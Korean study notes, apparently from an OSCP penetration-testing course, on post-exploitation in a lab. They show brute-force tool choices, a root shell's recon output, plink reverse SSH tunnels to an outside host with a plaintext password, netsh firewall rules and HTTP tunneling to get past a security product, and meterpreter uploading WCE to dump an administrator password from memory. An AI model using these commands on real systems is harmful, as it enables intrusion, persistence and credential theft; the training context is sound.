브루트포스
- 폼인증: hydra
- basic 인증: medusa
- DB 해시 값: John or hashcat
소프트웨어 버전
searchsploit을 통해 exploit 코드 검색
- 로그인 세션이 필요한 것일 수 있음, 이럴 경우에는 일부 코드 수정 필요
정보수집, 다른 네트워크 체크
root@adminsql:/tmp# cd /var/www/
root@adminsql:/var/www# ls -la
root@adminsql:/var/www# cd daaa118f0809caa929e0c0baae75d27a
root@adminsql:/var/www/daaa118f0809caa929e0c0baae75d27a# ls -la
root@adminsql:/var/www/daaa118f0809caa929e0c0baae75d27a# cat .htaccess
Order deny,allow
Deny from all
Allow from 10.7.0.0/255.255.255.0
root@adminsql:/tmp# cat /var/log/apache2/access.log |grep '10.7.0'
10.7.0.53 - -"GET /daaa118f0809caa929e0c0baae75d27a/ClockSigned.jar HTTP/1.1" 200
SSH 포트포워딩
- 실패. 보안솔루션이 80포트(HTTP) 외 모든 포트를 차단하고 있는 상태
C:\Windows\temp>plink -l root -pw 23847sd98sdf987sf98732 -R 3389:127.0.0.1:3389
208.68.234.100
- 80포트 지정시 성공
C:\Windows\temp>plink -l root -pw 23847sd98sdf987sf98732 -R 3389:127.0.0.1:3389
208.68.234.100 -P 80
보안솔루션 우회
- HTTP로 Encapsulating하여 SSH 터널링을 시도할 것임
1. HTTP 터널링 프로그램 업로드 후 방화벽 예외처리 등록(3000포트)
* 관리자 계정(권한)에서만 가능함
C:\Windows\temp> netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
C:\Windows\temp> netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
C:\Windows\temp> netsh advfirewall firewall add rule name="1080" dir=in action=allow
protocol=TCP localport=1080
C:\Windows\temp> netsh advfirewall firewall add rule name="1079" dir=in action=allow
protocol=TCP localport=1079
C:\Windows\temp> httptunnel_client.exe
2. SSH Tunneling with HTTP Encapsulation
C:\Windows\Temp>plink -l root -pw 23847sd98sdf987sf98732 -R 3389:127.0.0.1:3389
127.0.0.1 -P 3000
WCE
관리자 권한 쉘 획득 후 WCE 업로드, 메모리에 있는 관리자 비밀번호 추출
meterpreter > getuid
Server username: CITRIX\Administrator
meterpreter > upload /var/www/wce_protected.exe c:\\Windows\\temp
meterpreter > shell
C:\Users\mike\Documents> wce_protected.exe –w
다음 과정에 대한 내용은 생략
- Kernel Exploit
- Client Side Attack
- AD Misconfiguration
'OSCP > OSCP Course PDF' 카테고리의 다른 글
17. Bypassing Antivirus Software (0) | 2020.06.02 |
---|---|
15. Port Redirection and Tunneling - 2 (Dynamic, Proxychain,http터널링) (0) | 2020.03.20 |
15. Port Redirection and Tunneling - 1 (Local,Remote) (0) | 2020.03.18 |
12. - Client Side Attacks (0) | 2020.03.10 |
14. Password Attacks -2 (0) | 2020.03.06 |